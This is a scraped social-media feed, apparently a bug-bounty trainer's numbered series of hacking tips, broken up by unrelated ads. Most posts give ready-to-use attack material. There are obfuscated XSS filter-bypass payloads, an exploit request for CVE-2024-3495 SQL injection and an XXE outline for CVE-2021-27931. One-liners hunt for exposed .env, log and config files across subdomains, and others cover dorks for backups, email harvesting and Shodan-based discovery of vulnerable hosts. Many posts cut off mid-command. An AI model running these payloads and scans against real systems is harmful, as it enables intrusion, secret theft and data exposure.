We conduct trainings and live sessions, and this is what our last batch shared 🔥 more.. : https://t.co/s2gotZAhFH

Post 16/30 : Quick SQLi OneLiner SQL Injection One-Liner waybackurls target[.]com | grep '=' | sort -u | nuclei -t ../fuzzing-templates/sqli -dast Working: This fetches all URLs with query parameters for the target domain using waybackurls, filters unique parameterized

Post 15/30 : Bug Bounty Basics Checklist Complete guide :

Post 14/30 : PhpMyadmin checklist :

Post 13/30 : Next.js Checklist here :

NYU seniors: automate software engineering before someone else does. $250k/yr + competitive equity, SF.

Post 12/30 : XSS Paylaods Payload 1 - Iframe Onload (Attribute Splitting & Obfuscation): Bypasses many script tag and naive filters Caught by: Advanced filter sets only <iframe/onload​='this["src"]="javas&Tab;cript​:al"+"ert``"';> Payload 2 - Img Onerror with JS Concatenation:

Post 11/30 : XSS Payloads You can check this payload Payload 1 - Direct Script: Basic file type checks Caught by: Most WAFs <svg xmlns=" https://t.co/VSoIBjzh4s"><​script>alert('XSS')<​/script></svg> Payload 2 - Event Handler: Bypasses: Script tag filters Caught by:

Had a blast leading a session with #BSidesAgra! 🚀on info gathering & bug bounty tips! Recordings & resources: https://t.co/YZcCPBdtna

We conduct trainings and live sessions, and this is what our last batch shared 🔥 more.. : https://t.co/s2gotZAhFH

Post 10/30 : Config.js FOFA Dork: host="<TARGET>" && body="config.js" (You can add more files like config.json, app.config.js, more) Open the results and look for File in that Source code

Post 9/30 : XSS Exploitation : https://<TARGET>/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E Payload :

Post 8/30 : Log files and leaks 1. Gather list of subdomain subfinder -d <target>.tld -o subdomains.txt 2, Then you can use this One-liner while read host; do echo "$host/app.log" echo "$host/error.log" echo "$host/access.log" echo "$host/debug.log" echo

Post 7/30 : .env 1. Gather a list of subdomains sub finder -d <target>.tld -o subdomains.txt 2. then you can use this One-liner while read host; do echo "$host/.env" done < subdomains.txt | httpx -mc 200 It will find the accessible .env file

Post 6/30 : CVE-2021-27931 - XXE 1. Find or Bruteforce PageControllerXml.jsp 2. send a crafted PAYLOAD request for a Pingback Note: Always try to chain this pingback into more impactful ways don't report it as it is. Payload and further details: https://t.co/bJn874fIr4

Need a job? Join ICE today. ICE offers competitive salaries & benefits like health insurance and retirement plans.

Post 5/30 : CVE-2024-3495 - SQLi 1. Find wp-admin.ajax 2. Find out nonce : curl "Target-url" | grep nonce 3. exploit and get version curl -sk ' https://<TARGET>/wp-admin/admin-ajax.php' \ -d "action=tc_csca_get_states" \ -d "nonce_ajax=VALID-NONCE" \ -d "cnt=1 OR 0 UNION SELECT

Post 4/30 : Misconfigured Firebase with read/write access systematically: 1. Get the Firebase URL: Find the database URL in app source code or network traffic, e.g., https://<project-id>.<firebaseio>[.]com/. 2. Check read access: Open your browser or use curl to check if you

Post 3/30 : Simple dorks Dork : site:*.com intitle:"index of" "Backup" OR "Website-Backup" OR "User record" this one is a simple dork try adding more specific endpoints or file to (I will also drop some soon) this can be helpful

Post 2/30: Email Leaks from waybackurls cat waybackurls \ | grep -Eoi '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' \ | tr '[:upper:]' '[:lower:]' \ | grep -vE '\.(png|jpg|jpeg|svg|gif)$' \ | grep -vE

Post 1/30 : CVE-2025-29927 How to find Vulnerable Assets for it! Steps; 1. Get all domains and IPS Domains >> Subfinder -dL list-of-domain.txt -o subdomains.txt IPs >> shodan search "ssl:'domain.tld'" --fields ip_str --limit 1000 >> ips.txt 2. find their open ports using